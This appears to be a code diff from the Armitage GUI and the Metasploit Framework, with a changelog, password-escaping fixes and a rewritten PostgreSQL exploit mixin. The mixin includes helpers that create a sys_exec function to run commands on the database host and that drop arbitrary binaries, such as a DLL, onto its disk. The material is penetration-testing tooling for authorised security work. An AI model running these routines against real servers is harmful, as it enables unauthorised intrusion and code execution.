|
||||
# credential_add("host", "port", "user, "pass", "type")
|
||||
sub credential_add {
|
||||
cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P $4");
|
||||
cmd_safe("creds -a $1 -p $2 -t $5 -u $3 -P " . _fix_pass($4));
|
||||
}
|
||||
|
||||
# credential_delete("host", port, "user", "pass");
|
||||
sub credential_delete {
|
||||
cmd_safe("creds -a $1 -p $2 -u $3 -P $4 -d");
|
||||
cmd_safe("creds -a $1 -p $2 -u $3 -P " . _fix_pass($4) . " -d");
|
||||
}
|
||||
|
||||
sub credential_list {
|
||||
|
|
|
@ -59,6 +59,9 @@ sub showHost {
|
|||
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
|
||||
push(@overlay, 'resources/windowsxp.png');
|
||||
}
|
||||
else if ("*8*" iswm $match) {
|
||||
push(@overlay, 'resources/windows8.png');
|
||||
}
|
||||
else {
|
||||
push(@overlay, 'resources/windows7.png');
|
||||
}
|
||||
|
|
|
@ -22,7 +22,7 @@ setMissPolicy(%results2, { return @(); });
|
|||
# %exploits is populated in menus.sl when the client-side attacks menu is constructed
|
||||
|
||||
# a list of exploits that should always use a reverse shell... this list needs to grow.
|
||||
@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php");
|
||||
@always_reverse = @("multi/samba/usermap_script", "unix/misc/distcc_exec", "windows/http/xampp_webdav_upload_php", "windows/postgres/postgres_payload", "linux/postgres/postgres_payload");
|
||||
|
||||
#
|
||||
# generate menus for a given OS
|
||||
|
@ -599,26 +599,28 @@ sub host_attack_items {
|
|||
}
|
||||
}
|
||||
|
||||
local('$service $name @options $a $port $foo');
|
||||
local('$name %options $a $port $host $service');
|
||||
%options = ohash();
|
||||
|
||||
foreach $port => $service (%hosts[$2[0]]['services']) {
|
||||
$name = $service['name'];
|
||||
if ($port == 445 && "*Windows*" iswm getHostOS($2[0])) {
|
||||
push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
|
||||
}
|
||||
else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
|
||||
push(@options, @($name, lambda(&show_login_dialog, \$service, $hosts => $2)));
|
||||
}
|
||||
else if ($name eq "microsoft-ds") {
|
||||
push(@options, @("psexec", lambda(&pass_the_hash, $hosts => $2)));
|
||||
foreach $host ($2) {
|
||||
foreach $port => $service (%hosts[$host]['services']) {
|
||||
$name = $service['name'];
|
||||
if ($port == 445 && "*Windows*" iswm getHostOS($host)) {
|
||||
%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
|
||||
}
|
||||
else if ("scanner/ $+ $name $+ / $+ $name $+ _login" in @auxiliary) {
|
||||
%options[$name] = lambda(&show_login_dialog, \$service, $hosts => $2);
|
||||
}
|
||||
else if ($name eq "microsoft-ds") {
|
||||
%options["psexec"] = lambda(&pass_the_hash, $hosts => $2);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (size(@options) > 0) {
|
||||
if (size(%options) > 0) {
|
||||
$a = menu($1, 'Login', 'L');
|
||||
foreach $service (@options) {
|
||||
($name, $foo) = $service;
|
||||
item($a, $name, $null, $foo);
|
||||
foreach $name (sorta(keys(%options))) {
|
||||
item($a, $name, $null, %options[$name]);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -678,6 +680,7 @@ sub addFileListener {
|
|||
$actions["SigningKey"] = $actions["*FILE*"];
|
||||
$actions["Wordlist"] = $actions["*FILE*"];
|
||||
$actions["WORDLIST"] = $actions["*FILE*"];
|
||||
$actions["REXE"] = $actions["*FILE*"];
|
||||
|
||||
# set up an action to choose a session
|
||||
$actions["SESSION"] = lambda(&chooseSession);
|
||||
|
|
|
@ -52,6 +52,7 @@ sub host_selected_items {
|
|||
item($i, '1. 95/98/2000', '1', setHostValueFunction($2, "os_name", "Micosoft Windows", "os_flavor", "2000"));
|
||||
item($i, '2. XP/2003', '2', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "XP"));
|
||||
item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista"));
|
||||
item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8"));
|
||||
|
||||
item($h, "Remove Host", 'R', clearHostFunction($2));
|
||||
}
|
||||
|
|
|
@ -41,6 +41,7 @@ import ui.*;
|
|||
|
||||
# strip any funky characters that will cause this call to throw an exception
|
||||
$user = replace($user, '\P{Graph}', "");
|
||||
$hash = fixPass($hash);
|
||||
|
||||
[$queue addCommand: $null, "creds -a $host -p 445 -t smb_hash -u $user -P $hash"];
|
||||
}
|
||||
|
@ -106,6 +107,7 @@ sub createCredentialsTab {
|
|||
$queue = [new armitage.ConsoleQueue: $client];
|
||||
foreach $entry ($entries) {
|
||||
($user, $pass, $host) = $entry;
|
||||
$pass = fixPass($pass);
|
||||
[$queue addCommand: $null, "creds -d $host -u $user -P $pass"];
|
||||
}
|
||||
|
||||
|
|
|
@ -114,7 +114,12 @@ sub loadPreferences {
|
|||
|
||||
sub loadDatabasePreferences {
|
||||
if ($yaml_file eq "" || !-exists $yaml_file) {
|
||||
$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
|
||||
if (thisIsTheirCommercialStuff()) {
|
||||
$yaml_file = getFileProper($BASE_DIRECTORY, "ui", "config", "database.yml");
|
||||
}
|
||||
else {
|
||||
$yaml_file = getFileProper($BASE_DIRECTORY, "config", "database.yml");
|
||||
}
|
||||
}
|
||||
|
||||
if (!-exists $yaml_file) {
|
||||
|
@ -340,6 +345,7 @@ sub createPreferencesTab {
|
|||
sub setupBaseDirectory {
|
||||
local('%o');
|
||||
%o = call($client, "module.options", "post", "multi/gather/dns_bruteforce");
|
||||
|
||||
if ("NAMELIST" in %o && "default" in %o["NAMELIST"]) {
|
||||
$BASE_DIRECTORY = getFileParent(getFileParent(getFileParent(getFileParent(%o["NAMELIST"]["default"]))));
|
||||
$DATA_DIRECTORY = getFileParent(getFileParent(%o["NAMELIST"]["default"]));
|
||||
|
@ -385,3 +391,8 @@ sub dataDirectory {
|
|||
|
||||
return $f;
|
||||
}
|
||||
|
||||
sub thisIsTheirCommercialStuff {
|
||||
# check if we're living in a Metasploit 4.5+ installer environment.
|
||||
return iff("*app*pro*" iswm $BASE_DIRECTORY);
|
||||
}
|
||||
|
|
|
@ -294,6 +294,11 @@ sub startMetasploit {
|
|||
[System exit: 0];
|
||||
}
|
||||
|
||||
# if the user chooses c:\metasploit AND we're in the 4.5 environment... adjust
|
||||
if (-exists getFileProper($msfdir, "apps", "pro", "msf3")) {
|
||||
$msfdir = getFileProper($msfdir, "apps", "pro");
|
||||
}
|
||||
|
||||
if (charAt($msfdir, -1) ne "\\") {
|
||||
$msfdir = "$msfdir $+ \\";
|
||||
}
|
||||
|
@ -472,6 +477,15 @@ sub _module_execute {
|
|||
$host = "all";
|
||||
}
|
||||
|
||||
# fix SMBPass and PASSWORD options if necessary...
|
||||
if ("PASSWORD" in $3) {
|
||||
$3['PASSWORD'] = fixPass($3['PASSWORD']);
|
||||
}
|
||||
|
||||
if ("SMBPass" in $3) {
|
||||
$3['SMBPass'] = fixPass($3['SMBPass']);
|
||||
}
|
||||
|
||||
# okie then, let's create a console and execute all of this stuff...
|
||||
|
||||
local('$queue $key $value');
|
||||
|
@ -607,3 +621,8 @@ sub initConsolePool {
|
|||
[$client addHook: "console.release", $pool];
|
||||
[$client addHook: "console.release_and_destroy", $pool];
|
||||
}
|
||||
|
||||
sub fixPass {
|
||||
return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
|
||||
}
|
||||
|
||||
|
|
|
@ -428,13 +428,6 @@ public class Cortana implements Loadable, RuntimeWarningWatcher {
|
|||
|
||||
/* start the timer thread */
|
||||
new cortana.support.Heartbeat(events).start();
|
||||
|
||||
/* regularly communicate with Metasploit or else our connection will drop */
|
||||
new ArmitageTimer(client, "core.version", 200 * 1000L, new ArmitageTimerClient() {
|
||||
public boolean result(String command, Object[] arguments, Map results) {
|
||||
return true;
|
||||
}
|
||||
}, false);
|
||||
}
|
||||
started = true;
|
||||
}
|
||||
|
|
|
@ -25,6 +25,7 @@ public class ATable extends JTable {
|
|||
specialitems.add("SigningCert");
|
||||
specialitems.add("WORDLIST");
|
||||
specialitems.add("SESSION");
|
||||
specialitems.add("REXE");
|
||||
|
||||
return new TableCellRenderer() {
|
||||
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {
|
||||
|
|
|
@ -1,6 +1,24 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
4 Jan 13 (tested against msf 16252)
|
||||
--------
|
||||
- Added a helper to set REXE option
|
||||
- Added an icon to represent Windows 8
|
||||
- [host] -> Login menu is now built using open services for all
|
||||
highlighted hosts, not just the first one.
|
||||
- [host] -> Login items now escape punctuation characters in passwords
|
||||
before passing them to a framework module.
|
||||
- Added the windows and linux postgres_payload exploits to the use a
|
||||
reverse payload by default list.
|
||||
- Small tweak to allow Armitage to work with Metasploit 4.5 installed
|
||||
environment on Windows.
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- &credential_add and &credential_delete no longer break when a
|
||||
password has creative punctuation in it.
|
||||
|
||||
26 Nov 12 (tested against msf 16114)
|
||||
---------
|
||||
- Windows command shell tab is now friendlier to commands that prompt
|
||||
|
|
|
@ -224,7 +224,7 @@ def nmap_validate_arg(str)
|
|||
disallowed_characters = /([\x00-\x19\x21\x23-\x26\x28\x29\x3b\x3e\x60\x7b\x7c\x7d\x7e-\xff])/n
|
||||
badchar = str[disallowed_characters]
|
||||
if badchar
|
||||
print_error "Malformed nmap arguments (contains '#{c}'): #{str}"
|
||||
print_error "Malformed nmap arguments (contains '#{badchar}'): #{str}"
|
||||
return false
|
||||
end
|
||||
# Check for commas outside of quoted arguments
|
||||
|
|
|
@ -676,6 +676,13 @@ class DBManager
|
|||
sess_data[:desc] = sess_data[:desc][0,255]
|
||||
end
|
||||
|
||||
# In the case of multi handler we cannot yet determine the true
|
||||
# exploit responsible. But we can at least show the parent versus
|
||||
# just the generic handler:
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
sess_data[:via_exploit] = sess_data[:datastore]['ParentModule']
|
||||
end
|
||||
|
||||
s = ::Mdm::Session.new(sess_data)
|
||||
s.save!
|
||||
|
||||
|
@ -684,19 +691,26 @@ class DBManager
|
|||
end
|
||||
|
||||
# If this is a live session, we know the host is vulnerable to something.
|
||||
# If the exploit used was multi/handler, though, we don't know what
|
||||
# it's vulnerable to, so it isn't really useful to save it.
|
||||
if opts[:session] and session.via_exploit and session.via_exploit != "exploit/multi/handler"
|
||||
if opts[:session] and session.via_exploit
|
||||
return unless host
|
||||
|
||||
mod = framework.modules.create(session.via_exploit)
|
||||
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
mod_fullname = sess_data[:datastore]['ParentModule']
|
||||
mod_name = ::Mdm::ModuleDetail.find_by_fullname(mod_fullname).name
|
||||
else
|
||||
mod_name = mod.name
|
||||
mod_fullname = mod.fullname
|
||||
end
|
||||
|
||||
vuln_info = {
|
||||
:host => host.address,
|
||||
:name => mod.name,
|
||||
:name => mod_name,
|
||||
:refs => mod.references,
|
||||
:workspace => wspace,
|
||||
:exploited_at => Time.now.utc,
|
||||
:info => "Exploited by #{mod.fullname} to create Session #{s.id}"
|
||||
:info => "Exploited by #{mod_fullname} to create Session #{s.id}"
|
||||
}
|
||||
|
||||
port = session.exploit_datastore["RPORT"]
|
||||
|
@ -706,10 +720,15 @@ class DBManager
|
|||
|
||||
vuln = framework.db.report_vuln(vuln_info)
|
||||
|
||||
if session.via_exploit == "exploit/multi/handler"
|
||||
via_exploit = sess_data[:datastore]['ParentModule']
|
||||
else
|
||||
via_exploit = session.via_exploit
|
||||
end
|
||||
attempt_info = {
|
||||
:timestamp => Time.now.utc,
|
||||
:workspace => wspace,
|
||||
:module => session.via_exploit,
|
||||
:module => via_exploit,
|
||||
:username => session.username,
|
||||
:refs => mod.references,
|
||||
:session_id => s.id,
|
||||
|
|
|
@ -13,10 +13,13 @@ module Exploit::Remote::Postgres
|
|||
require 'postgres_msf'
|
||||
require 'base64'
|
||||
include Msf::Db::PostgresPR
|
||||
|
||||
# @!attribute [rw] postgres_conn
|
||||
# @return [::Msf::Db::PostgresPR::Connection]
|
||||
attr_accessor :postgres_conn
|
||||
|
||||
#
|
||||
# Creates an instance of a MSSQL exploit module.
|
||||
# Creates an instance of a PostgreSQL exploit module.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
@ -38,27 +41,66 @@ module Exploit::Remote::Postgres
|
|||
register_autofilter_services(%W{ postgres })
|
||||
end
|
||||
|
||||
# postgres_login takes a number of arguments (defaults to the datastore for
|
||||
# appropriate values), and will either populate self.postgres_conn and return
|
||||
# :connected, or will return :error, :error_databse, or :error_credentials
|
||||
# Fun fact: if you get :error_database, it means your username and password
|
||||
# was accepted (you just failed to guess a correct running database instance).
|
||||
# Note that postgres_login will first trigger postgres_logout if the module
|
||||
# is already connected.
|
||||
def postgres_login(args={})
|
||||
# @!group Datastore accessors
|
||||
|
||||
# Return the datastore value of the same name
|
||||
# @return [String] IP address of the target
|
||||
def rhost; datastore['RHOST']; end
|
||||
# Return the datastore value of the same name
|
||||
# @return [Fixnum] TCP port where the target service is running
|
||||
def rport; datastore['RPORT']; end
|
||||
# Return the datastore value of the same name
|
||||
# @return [String] Username for authentication
|
||||
def username; datastore['USERNAME']; end
|
||||
# Return the datastore value of the same name
|
||||
# @return [String] Password for authentication
|
||||
def password; datastore['PASSWORD']; end
|
||||
# Return the datastore value of the same name
|
||||
# @return [String] Database to connect to when authenticating
|
||||
def database; datastore['DATABASE']; end
|
||||
# Return the datastore value of the same name
|
||||
# @return [Boolean] Whether to print verbose output
|
||||
def verbose; datastore['VERBOSE']; end
|
||||
|
||||
# @!endgroup
|
||||
|
||||
# Takes a number of arguments (defaults to the datastore for appropriate
|
||||
# values), and will either populate {#postgres_conn} and return
|
||||
# +:connected+, or will return +:error+, +:error_databse+, or
|
||||
# +:error_credentials+ in case of an error.
|
||||
#
|
||||
# Fun fact: if you get +:error_database+, it means your username and
|
||||
# password was accepted (you just failed to guess a correct running database
|
||||
# instance).
|
||||
#
|
||||
# @note This method will first call {#postgres_logout} if the module is
|
||||
# already connected.
|
||||
#
|
||||
# @param opts [Hash] Options for authenticating
|
||||
# @option opts [String] :database The database
|
||||
# @option opts [String] :username The username
|
||||
# @option opts [String] :username The username
|
||||
# @option opts [String] :server IP address or hostname of the target server
|
||||
# @option opts [Fixnum] :port TCP port on :server
|
||||
#
|
||||
# @return [:error_database] if user/pass are correct but database is wrong
|
||||
# @return [:error_credentials] if user/pass are wrong
|
||||
# @return [:error] if some other error occurred
|
||||
# @return [:connected] if everything went as planned
|
||||
def postgres_login(opts={})
|
||||
postgres_logout if self.postgres_conn
|
||||
db = args[:database] || datastore['DATABASE']
|
||||
username = args[:username] || datastore['USERNAME']
|
||||
password = args[:password] || datastore['PASSWORD']
|
||||
ip = args[:server] || datastore['RHOST']
|
||||
port = args[:port] || datastore['RPORT']
|
||||
db = opts[:database] || datastore['DATABASE']
|
||||
username = opts[:username] || datastore['USERNAME']
|
||||
password = opts[:password] || datastore['PASSWORD']
|
||||
ip = opts[:server] || datastore['RHOST']
|
||||
port = opts[:port] || datastore['RPORT']
|
||||
uri = "tcp://#{ip}:#{port}"
|
||||
|
||||
if Rex::Socket.is_ipv6?(ip)
|
||||
uri = "tcp://[#{ip}]:#{port}"
|
||||
end
|
||||
|
||||
verbose = args[:verbose] || datastore['VERBOSE']
|
||||
verbose = opts[:verbose] || datastore['VERBOSE']
|
||||
begin
|
||||
self.postgres_conn = Connection.new(db,username,password,uri)
|
||||
rescue RuntimeError => e
|
||||
|
@ -80,7 +122,9 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
end
|
||||
|
||||
# Logs out of a database instance.
|
||||
# Logs out of a database instance and sets {#postgres_conn} to nil
|
||||
#
|
||||
# @return [void]
|
||||
def postgres_logout
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
|
@ -92,9 +136,13 @@ module Exploit::Remote::Postgres
|
|||
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
|
||||
end
|
||||
|
||||
# If not currently connected, postgres_query will attempt to connect. If an
|
||||
# If not currently connected, attempt to connect. If an
|
||||
# error is encountered while executing the query, it will return with
|
||||
# :error ; otherwise, it will return with :complete.
|
||||
#
|
||||
# @param sql [String] The query to run
|
||||
# @param doprint [Boolean] Whether the result should be printed
|
||||
# @return [Hash]
|
||||
def postgres_query(sql=nil,doprint=false)
|
||||
ip = datastore['RHOST']
|
||||
port = datastore['RPORT']
|
||||
|
@ -104,7 +152,7 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
if self.postgres_conn
|
||||
sql ||= datastore['SQL']
|
||||
print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
|
||||
vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
|
||||
begin
|
||||
resp = self.postgres_conn.query(sql)
|
||||
rescue RuntimeError => e
|
||||
|
@ -151,15 +199,21 @@ module Exploit::Remote::Postgres
|
|||
return :complete
|
||||
end
|
||||
|
||||
# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
|
||||
# inferring version number from the failed authentication messages.
|
||||
# Attempts to fingerprint a remote PostgreSQL instance, inferring version
|
||||
# number from the failed authentication messages or simply returning the
|
||||
# result of "select version()" if authentication was successful.
|
||||
#
|
||||
# @return [Hash] A hash containing the version in one of the keys :preauth,
|
||||
# :auth, or :unkown, depending on how it was determined
|
||||
# @see #postgres_authed_fingerprint
|
||||
# @see #analyze_auth_error
|
||||
def postgres_fingerprint(args={})
|
||||
return postgres_authed_fingerprint if self.postgres_conn
|
||||
db = args[:database] || datastore['DATABASE']
|
||||
username = args[:username] || datastore['USERNAME']
|
||||
password = args[:password] || datastore['PASSWORD']
|
||||
rhost = args[:server] || datastore['RHOST']
|
||||
rport = args[:port] || datastore['RPORT']
|
||||
rhost = args[:server] || datastore['RHOST']
|
||||
rport = args[:port] || datastore['RPORT']
|
||||
|
||||
uri = "tcp://#{rhost}:#{rport}"
|
||||
if Rex::Socket.is_ipv6?(rhost)
|
||||
|
@ -176,6 +230,10 @@ module Exploit::Remote::Postgres
|
|||
return postgres_authed_fingerprint if self.postgres_conn
|
||||
end
|
||||
|
||||
# Ask the server what its version is
|
||||
#
|
||||
# @return (see #postgres_fingerprint)
|
||||
# @see #postgres_fingerprint
|
||||
def postgres_authed_fingerprint
|
||||
resp = postgres_query("select version()",false)
|
||||
ver = resp[:complete].rows[0][0]
|
||||
|
@ -185,6 +243,10 @@ module Exploit::Remote::Postgres
|
|||
# Matches up filename, line number, and routine with a version.
|
||||
# These all come from source builds of Postgres. TODO: check
|
||||
# in on the binary distros, see if they're different.
|
||||
#
|
||||
# @param e [RuntimeError] The exception raised by Connection.new
|
||||
# @return (see #postgres_fingerprint)
|
||||
# @see #postgres_fingerprint
|
||||
def analyze_auth_error(e)
|
||||
fname,fline,froutine = e.to_s.split("\t")[3,3]
|
||||
fingerprint = "#{fname}:#{fline}:#{froutine}"
|
||||
|
@ -223,14 +285,26 @@ module Exploit::Remote::Postgres
|
|||
when "Fauth.c:L273:Rauth_failed" ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
|
||||
when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)
|
||||
|
||||
when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
|
||||
when "Fpostinit.c:L709:RInitPostgres" ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)
|
||||
|
||||
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
|
||||
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
|
||||
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
|
||||
|
||||
# Windows
|
||||
|
||||
when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
|
||||
when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
|
||||
when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication' ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)
|
||||
|
||||
when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication' ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
|
||||
when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed' ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)
|
||||
|
||||
when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed' ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
|
||||
when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres' ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
|
||||
when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication' ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)
|
||||
|
||||
# OpenSolaris (thanks Alexander!)
|
||||
|
||||
when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
|
||||
|
@ -243,6 +317,8 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
end
|
||||
|
||||
# @return [String] The password as provided by the user or a random one if
|
||||
# none has been given.
|
||||
def postgres_password
|
||||
if datastore['PASSWORD'].to_s.size > 0
|
||||
datastore['PASSWORD'].to_s
|
||||
|
@ -252,7 +328,7 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
|
||||
# This presumes the user has rights to both the file and to create a table.
|
||||
# If not, postgre_query() will return an error (usually :sql_error),
|
||||
# If not, {#postgres_query} will return an error (usually :sql_error),
|
||||
# and it should be dealt with by the caller.
|
||||
def postgres_read_textfile(filename)
|
||||
# Check for temp table creation privs first.
|
||||
|
@ -267,6 +343,8 @@ module Exploit::Remote::Postgres
|
|||
return postgres_query(read_query,true)
|
||||
end
|
||||
|
||||
# @return [Boolean] Whether the current user has privilege +priv+ on the
|
||||
# current database
|
||||
def postgres_has_database_privilege(priv)
|
||||
sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
|
||||
ret = postgres_query(sql,false)
|
||||
|
@ -278,8 +356,9 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
|
||||
# Creates the function sys_exec() in the pg_temp schema.
|
||||
# @deprecated Just get a real shell instead
|
||||
def postgres_create_sys_exec(dll)
|
||||
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
|
||||
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
|
||||
resp = postgres_query(q);
|
||||
if resp[:sql_error]
|
||||
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
|
||||
|
@ -290,6 +369,8 @@ module Exploit::Remote::Postgres
|
|||
|
||||
# This presumes the pg_temp.sys_exec() udf has been installed, almost
|
||||
# certainly by postgres_create_sys_exec()
|
||||
#
|
||||
# @deprecated Just get a real shell instead
|
||||
def postgres_sys_exec(cmd)
|
||||
print_status "Attempting to Execute: #{cmd}"
|
||||
q = "select pg_temp.sys_exec('#{cmd}')"
|
||||
|
@ -302,88 +383,106 @@ module Exploit::Remote::Postgres
|
|||
end
|
||||
|
||||
|
||||
# Takes a local filename and uploads it into a table as a Base64 encoded string.
|
||||
# Returns an array if successful, false if not.
|
||||
# Uploads the given local file to the remote server
|
||||
#
|
||||
# @param fname [String] Name of a file on the local filesystem to be
|
||||
# uploaded
|
||||
# @param remote_fname (see #postgres_upload_binary_data)
|
||||
# @return (see #postgres_upload_binary_data)
|
||||
def postgres_upload_binary_file(fname, remote_fname=nil)
|
||||
data = File.read(fname)
|
||||
postgres_upload_binary_data(data, remote_fname)
|
||||
end
|
||||
|
||||
# Writes data to disk on the target server.
|
||||
#
|
||||
# This is accomplished in 5 steps:
|
||||
# 1. Create a new object with "select lo_create(-1)"
|
||||
# 2. Delete any resulting rows in pg_largeobject table.
|
||||
# On 8.x and older, postgres inserts rows as a result of the call to
|
||||
# lo_create. Deleting them here approximates the state on 9.x where no
|
||||
# such insert happens.
|
||||
# 3. Break the data into LOBLOCKSIZE-byte chunks.
|
||||
# 4. Insert each of the chunks as a row in pg_largeobject
|
||||
# 5. Select lo_export to write the file to disk
|
||||
#
|
||||
# @param data [String] Raw binary to write to disk
|
||||
# @param remote_fname [String] Name of the file on the remote server where
|
||||
# the data will be stored. Default is "<random>.dll"
|
||||
# @return [nil] if any part of this process failed
|
||||
# @return [String] if everything went as planned, the name of the file we
|
||||
# dropped. This is really only useful if +remote_fname+ is nil
|
||||
def postgres_upload_binary_data(data, remote_fname=nil)
|
||||
data = postgres_base64_data(data)
|
||||
tbl,fld = postgres_create_stager_table
|
||||
return false unless data && tbl && fld
|
||||
q = "insert into #{tbl}(#{fld}) values('#{data}')"
|
||||
resp = postgres_query(q)
|
||||
if resp[:sql_error]
|
||||
print_error resp[:sql_error]
|
||||
return false
|
||||
end
|
||||
oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname)
|
||||
return false unless oid && fout
|
||||
return [tbl,fld,fout,oid]
|
||||
end
|
||||
|
||||
# Writes b64 data from a table field, decoded, to disk.
|
||||
#
|
||||
# This is accomplished with 3 sql queries:
|
||||
# 1. select lo_create
|
||||
# 2. version dependant:
|
||||
# - on 9.x, insert into pg_largeobject
|
||||
# - on older versions, update pg_largeobject
|
||||
# 3. select lo_export to write the file to disk
|
||||
#
|
||||
def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
|
||||
oid = rand(60000) + 1000
|
||||
remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
|
||||
|
||||
ver = postgres_fingerprint
|
||||
case ver[:auth]
|
||||
when /PostgreSQL 9\./
|
||||
# 9.x does *not* insert the largeobject into the table when you do
|
||||
# the lo_create, so we must insert it ourselves.
|
||||
queries = [
|
||||
"select lo_create(#{oid})",
|
||||
"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
|
||||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
else
|
||||
# 8.x inserts the largeobject into the table when you do the
|
||||
# lo_create, so we with a value.
|
||||
#
|
||||
# 7.x is an unknown, but this behavior was the default before the
|
||||
# addition of support for 9.x above, so try it this way and hope
|
||||
# for the best
|
||||
queries = [
|
||||
"select lo_create(#{oid})",
|
||||
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
|
||||
"select lo_export(#{oid}, '#{remote_fname}')"
|
||||
]
|
||||
# From the Postgres documentation:
|
||||
# SELECT lo_creat(-1); -- returns OID of new, empty large object
|
||||
# Doing it this way instead of calling lo_create with a random number
|
||||
# ensures that we don't accidentally hit the id of a real object.
|
||||
resp = postgres_query "select lo_creat(-1)"
|
||||
unless resp and resp[:complete] and resp[:complete].rows[0]
|
||||
print_error "Failed to get a new loid"
|
||||
return
|
||||
end
|
||||
|
||||
oid = resp[:complete].rows[0][0].to_i
|
||||
|
||||
queries = [ "delete from pg_largeobject where loid=#{oid}" ]
|
||||
|
||||
# Break the data into smaller chunks that can fit in the size allowed in
|
||||
# the pg_largeobject data column.
|
||||
# From the postgres documentation:
|
||||
# "The amount of data per page is defined to be LOBLKSIZE (which is
|
||||
# currently BLCKSZ/4, or typically 2 kB)."
|
||||
# Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
|
||||
# stick to 2kB.
|
||||
chunks = []
|
||||
while ((c = data.slice!(0..2047)) && c.length > 0)
|
||||
chunks.push c
|
||||
end
|
||||
|
||||
chunks.each_with_index do |chunk, pageno|
|
||||
b64_data = postgres_base64_data(chunk)
|
||||
insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
|
||||
queries.push( "#{insert}"%[oid, pageno, b64_data] )
|
||||
end
|
||||
queries.push "select lo_export(#{oid}, '#{remote_fname}')"
|
||||
|
||||
# Now run each of the queries we just built
|
||||
queries.each do |q|
|
||||
resp = postgres_query(q)
|
||||
if resp && resp[:sql_error]
|
||||
print_error "Could not write the library to disk."
|
||||
print_error resp[:sql_error]
|
||||
break
|
||||
# Can't really recover from this, bail
|
||||
return nil
|
||||
end
|
||||
end
|
||||
return oid,remote_fname
|
||||
return remote_fname
|
||||
end
|
||||
|
||||
# Base64's a file and returns the data.
|
||||
# Calls {#postgres_base64_data} with the contents of file +fname+
|
||||
#
|
||||
# @param fname [String] Name of a file on the local system
|
||||
# @return (see #postgres_base64_data)
|
||||
def postgres_base64_file(fname)
|
||||
data = File.open(fname, "rb") {|f| f.read f.stat.size}
|
||||
postgres_base64_data(data)
|
||||
end
|
||||
|
||||
# Converts data to base64 with no newlines
|
||||
#
|
||||
# @param data [String] Raw data to be base64'd
|
||||
# @return [String] A base64 string suitable for passing to postgresql's
|
||||
# decode(..., 'base64') function
|
||||
def postgres_base64_data(data)
|
||||
[data].pack("m*").gsub(/\r?\n/,"")
|
||||
end
|
||||
|
||||
|
||||
# Creates a temporary table to store base64'ed binary data in.
|
||||
#
|
||||
# @deprecated No longer necessary since we can insert base64 data directly
|
||||
